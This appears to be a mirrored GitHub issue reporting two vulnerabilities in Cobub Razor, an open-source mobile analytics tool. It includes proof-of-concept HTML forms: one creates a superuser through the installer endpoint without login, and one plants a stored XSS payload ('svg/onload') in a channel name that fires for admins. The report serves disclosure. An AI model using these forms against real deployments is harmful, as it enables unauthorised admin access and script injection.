Giters

cobub / razor

Cobub Razor - Open Source Mobile Analytics Solution

Home Page:http://www.cobub.com

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Some vulnerability

ppb2018 opened this issue · comments

commented
  1. create user without login
    Just update the url without login, the test user will be create.
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/install/installation/createuserinfo" method="POST">
      <input type="hidden" name="siteurl" value="http&#58;&#47;&#47;127&#46;0&#46;0&#46;1&#47;" />
      <input type="hidden" name="superuser" value="test" />
      <input type="hidden" name="pwd" value="test123" />
      <input type="hidden" name="verifypassword" value="test123" />
      <input type="hidden" name="email" value="12&#64;qq&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

2.add data without login and execute evil code.

Change the channel_id then Open html page even without login.When admin access /index.php?/manage/channel ,the evil code will execute.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/index.php?/manage/channel/modifychannel" method="POST">
      <input type="hidden" name="channel&#95;id" value="979" />
      <input type="hidden" name="channel&#95;name" value="xss><svg/onload=alert(1)>" />
      <input type="hidden" name="platform" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>